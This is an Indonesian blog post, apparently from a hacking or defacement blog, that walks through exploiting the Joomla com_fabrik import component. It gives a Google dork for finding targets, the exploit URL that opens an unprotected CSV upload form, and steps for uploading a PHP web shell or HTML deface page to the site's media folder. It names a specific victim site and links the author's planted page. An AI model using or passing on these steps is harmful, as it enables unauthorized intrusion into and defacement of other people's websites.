1. Ketik dork berikut ke google : inurl:viewTable?cid= site:com
2. Akan ada banyak web yang akan muncul ,terserah anda dan pilih salah satu untuk di eksekusi dan saya ambil contoh site dengan : http://www.dalforner.it/
3.Setelah web dibuka, maka akan muncul Sorry this form is not publish Trus Masukkan exploit ini : index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Maka Contoh : www.dalforner.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Jika berhasil akan muncul form upload seperti ini , Jika tidak berhasil cari target lain.
5. Klik "pilih file" untuk memilih Shell.PHP / Script.HTML kamu , dan klik "Import CSV untuk mengupload
6. Jika berhasil, buka shell.php anda dengan format www.site.com/media/namashell.php , jika tidak bisa mengUpload Shell.php coba Upload Script.html kamu .www.site.com/media/namascript.html
7. Dan muncullah shell kesayangan anda / Script anda. Namun jika tidak muncul juga , itu karena web tersebut tidak mendukung file berformat php maupun html.
Contoh punya saya > [ http://www.dalforner.it/media/index1.html ]
Trima kasih .....
0 komentar:
Catat Ulasan